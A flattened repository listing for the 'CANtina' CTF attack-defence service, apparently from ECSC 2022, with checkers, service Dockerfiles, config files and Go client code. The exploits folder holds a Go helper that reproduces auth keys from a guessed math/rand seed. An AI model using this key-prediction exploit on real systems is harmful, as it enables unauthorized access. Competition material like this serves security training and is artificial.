(from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /cantina/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: 9 | context: .. 10 | dockerfile: checker1/Dockerfile 11 | command: localhost 1 ${TICK} # ip, team, tick 12 | network_mode: "host" 13 | volumes: 14 | - checkerstate:/tmp 15 | -------------------------------------------------------------------------------- /cantina/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | certifi==2022.6.15.1 3 | cffi==1.15.1 4 | charset-normalizer==2.1.1 5 | cryptography==37.0.4 6 | h11==0.12.0 7 | httpcore==0.15.0 8 | httpx==0.23.0 9 | idna==3.3 10 | janus==1.0.0 11 | msgpack==1.0.4 12 | packaging==21.3 13 | pycparser==2.21 14 | pyparsing==3.0.9 15 | python-can==4.0.0 16 | PyYAML==6.0 17 | requests==2.28.1 18 | rfc3986==1.5.0 19 | sniffio==1.3.0 20 | typing_extensions==4.3.0 21 | urllib3==1.26.12 22 | wrapt==1.14.1 23 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/checkers/checker2/.gitkeep -------------------------------------------------------------------------------- /cantina/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | # Add requirements 7 | COPY checker2/requirements.txt /checker/requirements.txt 8 | RUN pip install -r requirements.txt 9 | 10 | # Add common cantina files/modules 11 | COPY checker2/music /checker/music 12 | COPY common/cantina/cantina /checker/cantina 13 | COPY common/cantinautils /checker/cantinautils 14 | COPY checker2/vgm /checker/vgm 15 | COPY common/message-ids.yaml /conf/message-ids.yaml 16 | 17 | # Add checker 18 | COPY checker2/checker.py /checker/checker.py 19 | USER ctf-checkermaster 20 | ENV CTF_CHECKERSCRIPT /checker/checker.py 21 | 22 | # set this to _checker 23 | ENV CTF_SERVICE cantina_checker2 24 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker2`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: 9 | context: .. 10 | dockerfile: checker2/Dockerfile 11 | command: localhost 1 ${TICK} # ip, team, tick 12 | network_mode: "host" 13 | volumes: 14 | - checkerstate:/tmp 15 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/music/cantina.vgm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/checkers/checker2/music/cantina.vgm -------------------------------------------------------------------------------- /cantina/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | certifi==2022.6.15.1 3 | cffi==1.15.1 4 | charset-normalizer==2.1.1 5 | cryptography==37.0.4 6 | h11==0.12.0 7 | httpcore==0.15.0 8 | httpx==0.23.0 9 | idna==3.3 10 | janus==1.0.0 11 | msgpack==1.0.4 12 | packaging==21.3 13 | pycparser==2.21 14 | pyparsing==3.0.9 15 | python-can==4.0.0 16 | PyYAML==6.0 17 | requests==2.28.1 18 | rfc3986==1.5.0 19 | sniffio==1.3.0 20 | typing_extensions==4.3.0 21 | urllib3==1.26.12 22 | wrapt==1.14.1 23 | kaitaistruct 24 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/vgm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/checkers/checker2/vgm/__init__.py -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/.gitignore: -------------------------------------------------------------------------------- 1 | *.egg-info/ 2 | __pycache__ 3 | build/ 4 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/__init__.py: -------------------------------------------------------------------------------- 1 | from .cipher import Cipher 2 | from . import kex 3 | from . import canopy 4 | from . import powcheck 5 | from . import tocan 6 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/canopy/.dockerignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/canopy/__init__.py: -------------------------------------------------------------------------------- 1 | from .server import Server 2 | from .client import Client 3 | from .fields import Session 4 | 5 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/kex/__init__.py: -------------------------------------------------------------------------------- 1 | from .key_exchange import KeyExchange 2 | from .exchange_server import KeyExchangeServer 3 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/tocan/__init__.py: -------------------------------------------------------------------------------- 1 | from .tocan import ToCanClient, pack_can_message 2 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/tocan/gateway.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | if __name__ == "__main__": 13 | 14 | 15 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from distutils.core import setup 3 | 4 | setup( 5 | name='CANtina Common Library', 6 | version='0.1', 7 | description='Common code required across CANtina components', 8 | packages=['cantina', 'cantina.canopy', 'cantina.kex', 'cantina.powcheck', 'cantina.tocan'], 9 | install_requires=[ 10 | 'cryptography == 37.0.4', 11 | 'msgpack == 1.0.4', 12 | 'python-can == 4.0.0', 13 | 'janus' 14 | ], 15 | python_requiers='>=3.10' 16 | ) 17 | -------------------------------------------------------------------------------- /cantina/dist/gateway/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./gateway /app/gateway 8 | 9 | RUN mkdir /data 10 | RUN chown -R cantina:cantina /data 11 | RUN chown -R cantina:cantina /app 12 | 13 | USER cantina 14 | EXPOSE 10020 15 | 16 | CMD ["/app/gateway"] 17 | -------------------------------------------------------------------------------- /cantina/dist/gateway/gateway: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/gateway/gateway -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.6-alpine 2 | # make sure to use a tag that won't be updated by the image maintainers 3 | 4 | RUN addgroup -S cantina && adduser -S cantina -G cantina 5 | 6 | RUN mkdir /app 7 | RUN mkdir /data 8 | RUN chown -R cantina:cantina /data 9 | RUN chown -R cantina:cantina /app 10 | WORKDIR /app 11 | 12 | # download and install the dependencies first, so these steps can be skipped 13 | # when teams update their service 14 | COPY requirements.txt /app/requirements.txt 15 | RUN pip install -r requirements.txt 16 | 17 | COPY . /app/ 18 | RUN chmod a+x /app/run.sh 19 | 20 | USER cantina 21 | EXPOSE 10024 22 | 23 | CMD /app/run.sh 24 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | Authlib==1.0.1 3 | certifi==2022.6.15.1 4 | cffi==1.15.1 5 | click==8.1.3 6 | cryptography==38.0.1 7 | h11==0.12.0 8 | httpcore==0.15.0 9 | httpx==0.23.0 10 | idna==3.3 11 | itsdangerous==2.1.2 12 | Jinja2==3.1.2 13 | kaitaistruct==0.10 14 | MarkupSafe==2.1.1 15 | pycparser==2.21 16 | python-multipart==0.0.5 17 | PyYAML==6.0 18 | rfc3986==1.5.0 19 | six==1.16.0 20 | sniffio==1.3.0 21 | starlette==0.20.4 22 | starlette-authlib==0.1.12 23 | uvicorn==0.18.3 24 | aiosqlite 25 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python /app/cleanup.py & 3 | uvicorn main:app --host 0.0.0.0 --port 10024 4 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS files ( 2 | id INTEGER PRIMARY KEY AUTOINCREMENT, 3 | created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, 4 | username TEXT NOT NULL, 5 | track TEXT NOT NULL, 6 | game TEXT NOT NULL, 7 | author TEXT NOT NULL, 8 | filename TEXT NOT NULL 9 | ); 10 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/assets/jukebox.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/jukebox-front/static/assets/jukebox.jpg -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/css/custom.css: -------------------------------------------------------------------------------- 1 | .top-nav { 2 | padding: var(--spacing); 3 | border-bottom: 1px solid #343434; 4 | background-color: #11191f; 5 | position: fixed; 6 | top: 0; 7 | left: 0; 8 | right: 0; 9 | width: 100%; 10 | z-index: 9999; 11 | } 12 | 13 | .menu-item-image { 14 | text-align: center; 15 | } 16 | 17 | #app { 18 | margin-top: 5rem; 19 | } 20 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | CANtina: Jukebox 9 | 10 | 11 | 13 | 14 |
15 |
16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/js/nav/AbstractNav.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | constructor(user_info) { 3 | this.user_info = user_info; 4 | } 5 | 6 | async getHtml() { 7 | return ` 8 | 11 | `; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/js/nav/Auth.js: -------------------------------------------------------------------------------- 1 | import AbstractNav from "./AbstractNav.js"; 2 | 3 | export default class extends AbstractNav { 4 | constructor(user_info) { 5 | super(user_info); 6 | } 7 | 8 | async getHtml() { 9 | const base = await super.getHtml(); 10 | return ` 11 | ${base} 12 | 17 | `; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/js/nav/UnAuth.js: -------------------------------------------------------------------------------- 1 | import AbstractNav from "./AbstractNav.js"; 2 | 3 | export default class extends AbstractNav { 4 | constructor(user_info) { 5 | super(user_info); 6 | } 7 | 8 | async getHtml() { 9 | const base = await super.getHtml(); 10 | return ` 11 | ${base} 12 | 16 | `; 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/js/views/AbstractView.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | constructor(user_data) { 3 | this.user_data = user_data; 4 | } 5 | 6 | setTitle(title) { 7 | document.title = title; 8 | } 9 | 10 | async registerEventHandlers() { 11 | } 12 | 13 | async getHtml() { 14 | return ""; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/vgm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/jukebox-front/vgm/__init__.py -------------------------------------------------------------------------------- /cantina/dist/jukebox-proxy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./jukebox-proxy /app/jukebox 8 | COPY ./static /app/static 9 | 10 | RUN mkdir /data 11 | RUN chown -R cantina:cantina /data 12 | RUN chown -R cantina:cantina /app 13 | 14 | USER cantina 15 | EXPOSE 10025 16 | 17 | CMD ["/app/jukebox"] 18 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-proxy/jukebox-proxy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/jukebox-proxy/jukebox-proxy -------------------------------------------------------------------------------- /cantina/dist/jukebox-proxy/static/cantina.vgm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/jukebox-proxy/static/cantina.vgm -------------------------------------------------------------------------------- /cantina/dist/keyserver/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./ksv /app/ksv 8 | 9 | RUN mkdir /data 10 | RUN chown -R cantina:cantina /data 11 | RUN chown -R cantina:cantina /app 12 | 13 | USER cantina 14 | 15 | CMD ["/app/ksv"] 16 | -------------------------------------------------------------------------------- /cantina/dist/keyserver/ksv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/keyserver/ksv -------------------------------------------------------------------------------- /cantina/dist/orderdb/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./odb /app/odb 8 | 9 | RUN mkdir /data 10 | RUN chown -R cantina:cantina /data 11 | RUN chown -R cantina:cantina /app 12 | 13 | USER cantina 14 | CMD ["/app/odb"] 15 | -------------------------------------------------------------------------------- /cantina/dist/orderdb/odb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/orderdb/odb -------------------------------------------------------------------------------- /cantina/dist/pos/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./pos /app/pos 8 | COPY ./static /static 9 | COPY ./order-items.yaml /app 10 | 11 | RUN mkdir /data 12 | RUN chown -R cantina:cantina /data 13 | RUN chown -R cantina:cantina /app 14 | 15 | USER cantina 16 | EXPOSE 10021 17 | 18 | CMD ["/app/pos"] 19 | -------------------------------------------------------------------------------- /cantina/dist/pos/pos: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/pos -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/cantina.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/cantina.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/bacon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/bacon.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/carbonara.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/carbonara.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/cheese.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/cheese.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/double.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/double.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/funghi.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/funghi.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/hawaii.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/hawaii.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/hawaii_lavish.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/hawaii_lavish.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/pomodoro.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/pomodoro.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/reaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/reaper.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/rigatoni.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/rigatoni.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/special.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/special.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/tonno.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/tonno.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/tortelloni.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/tortelloni.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/css/custom.css: -------------------------------------------------------------------------------- 1 | .top-nav { 2 | padding: var(--spacing); 3 | border-bottom: 1px solid #343434; 4 | background-color: #11191f; 5 | position: fixed; 6 | top: 0; 7 | left: 0; 8 | right: 0; 9 | width: 100%; 10 | z-index: 9999; 11 | } 12 | 13 | .menu-item-image { 14 | text-align: center; 15 | } 16 | 17 | #app { 18 | margin-top: 5rem; 19 | } 20 | 21 | code { 22 | display: block; 23 | white-space: pre-wrap; 24 | } 25 | -------------------------------------------------------------------------------- /cantina/dist/pos/static/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | CANtina 9 | 10 | 11 | 21 | 22 |
23 |
24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /cantina/dist/pos/static/js/views/AbstractView.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | setTitle(title) { 3 | document.title = title; 4 | } 5 | 6 | async getHtml() { 7 | return ""; 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /cantina/dist/userdb-back/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.6-alpine 2 | # make sure to use a tag that won't be updated by the image maintainers 3 | 4 | RUN addgroup -S cantina && adduser -S cantina -G cantina 5 | 6 | RUN mkdir /app 7 | RUN mkdir /data 8 | RUN chown -R cantina:cantina /data 9 | RUN chown -R cantina:cantina /app 10 | WORKDIR /app 11 | 12 | # download and install the dependencies first, so these steps can be skipped 13 | # when teams update their service 14 | COPY requirements.txt /app/requirements.txt 15 | RUN pip install -r requirements.txt 16 | 17 | COPY . /app/ 18 | RUN chmod a+x /app/run.sh 19 | 20 | USER cantina 21 | #CMD python main.py 22 | EXPOSE 10026 23 | 24 | CMD /app/run.sh 25 | 26 | -------------------------------------------------------------------------------- /cantina/dist/userdb-back/cleanup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import signal 3 | import sqlite3 4 | import os 5 | from pathlib import Path 6 | from threading import Event 7 | 8 | 9 | def do_cleanup(data_dir: Path): 10 | try: 11 | # Cleanup sqlite database 12 | con = sqlite3.connect(data_dir / "user.db") 13 | con.execute('delete from users where created <= datetime("now", "-30 minute")') 14 | con.commit() 15 | con.close() 16 | except Exception as ex: 17 | print(f'Got {ex}, continuing') 18 | 19 | 20 | if __name__ == '__main__': 21 | stop = Event() 22 | 23 | def quit(_, __): 24 | stop.set() 25 | for sig in('TERM', 'HUP', 'INT'): 26 | signal.signal(getattr(signal, 'SIG'+sig), quit) 27 | 28 | data_dir = Path(os.environ.get("DATA_DIR", "/data")) 29 | 30 | while not stop.is_set(): 31 | do_cleanup(data_dir) 32 | stop.wait(120) 33 | -------------------------------------------------------------------------------- /cantina/dist/userdb-back/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | click==8.1.3 3 | fastapi==0.83.0 4 | h11==0.13.0 5 | idna==3.3 6 | pydantic==1.10.2 7 | PyYAML==6.0 8 | sniffio==1.3.0 9 | starlette==0.19.1 10 | typing_extensions==4.3.0 11 | uvicorn==0.18.3 12 | cryptography 13 | msgpack 14 | -------------------------------------------------------------------------------- /cantina/dist/userdb-back/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python /app/cleanup.py & 3 | uvicorn main:app --host 0.0.0.0 --port 10026 4 | -------------------------------------------------------------------------------- /cantina/dist/userdb-back/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS users ( 2 | id INTEGER PRIMARY KEY AUTOINCREMENT, 3 | created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, 4 | username TEXT NOT NULL UNIQUE, 5 | authtoken TEXT NOT NULL 6 | ); 7 | -------------------------------------------------------------------------------- /cantina/dist/userdb-proxy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./userdb-proxy /app/udb 8 | 9 | RUN mkdir /data 10 | RUN chown -R cantina:cantina /data 11 | RUN chown -R cantina:cantina /app 12 | 13 | USER cantina 14 | 15 | CMD ["/app/udb"] 16 | -------------------------------------------------------------------------------- /cantina/dist/userdb-proxy/userdb-proxy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/userdb-proxy/userdb-proxy -------------------------------------------------------------------------------- /cantina/exploits/.gitignore: -------------------------------------------------------------------------------- 1 | venv/ 2 | __pycache__/ 3 | -------------------------------------------------------------------------------- /cantina/exploits/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/exploits/.gitkeep -------------------------------------------------------------------------------- /cantina/exploits/go-randgen/exploit-rand: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/exploits/go-randgen/exploit-rand -------------------------------------------------------------------------------- /cantina/exploits/go-randgen/go.mod: -------------------------------------------------------------------------------- 1 | module exploit-rand 2 | 3 | go 1.19 4 | -------------------------------------------------------------------------------- /cantina/exploits/go-randgen/rand.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | "math/rand" 7 | "os" 8 | "strconv" 9 | ) 10 | 11 | func main() { 12 | arg, _ := strconv.Atoi(os.Args[1]) 13 | seed := rand.NewSource(int64(arg)) 14 | rand := rand.New(seed) 15 | 16 | var authKey [32]byte 17 | rand.Read(authKey[:]) 18 | fmt.Println(base64.StdEncoding.EncodeToString(authKey[:])) 19 | } 20 | -------------------------------------------------------------------------------- /cantina/exploits/jukebox/cantina: -------------------------------------------------------------------------------- 1 | ../../checkers/common/cantina/cantina/ -------------------------------------------------------------------------------- /cantina/exploits/requirements.txt: -------------------------------------------------------------------------------- 1 | msgpack 2 | pwn 3 | requests 4 | python-can 5 | -------------------------------------------------------------------------------- /cantina/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=cantina 2 | PROTECTED_FILES=gateway/** 3 | -------------------------------------------------------------------------------- /cantina/src/.gitignore: -------------------------------------------------------------------------------- 1 | ./venv/ 2 | -------------------------------------------------------------------------------- /cantina/src/components/.dockerignore: -------------------------------------------------------------------------------- 1 | docker-compose.yml 2 | -------------------------------------------------------------------------------- /cantina/src/components/.gitignore: -------------------------------------------------------------------------------- 1 | data/ 2 | -------------------------------------------------------------------------------- /cantina/src/components/builder.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | docker buildx build --target copy -o out --file userdb-proxy/Dockerfile . 4 | docker buildx build --target copy -o out --file jukebox-proxy/Dockerfile . 5 | -------------------------------------------------------------------------------- /cantina/src/components/client/connect.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "cantina/client/connector" 5 | "cantina/common/can" 6 | "cantina/gateway/proxy" 7 | "fmt" 8 | "os" 9 | ) 10 | 11 | func main() { 12 | 13 | if len(os.Args) < 2 { 14 | fmt.Fprintln(os.Stderr, "Please provide a gw server address") 15 | return 16 | } 17 | 18 | addr := os.Args[1] 19 | 20 | canProx := connector.NewConnector( 21 | addr, 22 | ) 23 | 24 | canmsg := can.Message{ 25 | ArbitrationId: 999, 26 | Data: []byte("testingAAAAAAAAAAAA\x00"), 27 | } 28 | 29 | msg, _ := proxy.NewProxyMessageCanFrame(&canmsg) 30 | 31 | canProx.SendQueue() <- &msg 32 | 33 | for { 34 | val := <-canProx.RecvQueue() 35 | 36 | // TODO add error message type 37 | switch val.Type { 38 | case proxy.CanFrame: 39 | canmsg := new(can.Message) 40 | canmsg.Unmarshal(val.Data) 41 | fmt.Println(canmsg) 42 | } 43 | 44 | fmt.Println(val) 45 | } 46 | 47 | } 48 | -------------------------------------------------------------------------------- /cantina/src/components/client/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/client 2 | 3 | go 1.19 4 | 5 | require ( 6 | cantina/common v0.0.0-00010101000000-000000000000 7 | cantina/gateway v0.0.0-00010101000000-000000000000 8 | github.com/gordonklaus/portaudio v0.0.0-20220320131553-cc649ad523c1 9 | github.com/vmihailenco/msgpack v4.0.4+incompatible 10 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd 11 | ) 12 | 13 | require ( 14 | github.com/golang/protobuf v1.3.1 // indirect 15 | github.com/vmihailenco/msgpack/v5 v5.3.5 // indirect 16 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 17 | github.com/zekroTJA/timedmap v1.4.0 // indirect 18 | golang.org/x/net v0.0.0-20190603091049-60506f45cf65 // indirect 19 | google.golang.org/appengine v1.6.7 // indirect 20 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c // indirect 21 | ) 22 | 23 | replace cantina/gateway => ../gateway 24 | 25 | replace cantina/common => ../gocommon 26 | -------------------------------------------------------------------------------- /cantina/src/components/client/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "cantina/client/nes" 5 | "cantina/client/player" 6 | "fmt" 7 | "os" 8 | ) 9 | 10 | func main() { 11 | 12 | if len(os.Args) < 2 { 13 | fmt.Fprintln(os.Stderr, "Please provide a gw server address") 14 | return 15 | } 16 | 17 | addr := os.Args[1] 18 | 19 | apu := nes.NewAPU() 20 | player.Run(apu, addr) 21 | //APU.Step() 22 | println("hmm") 23 | } 24 | -------------------------------------------------------------------------------- 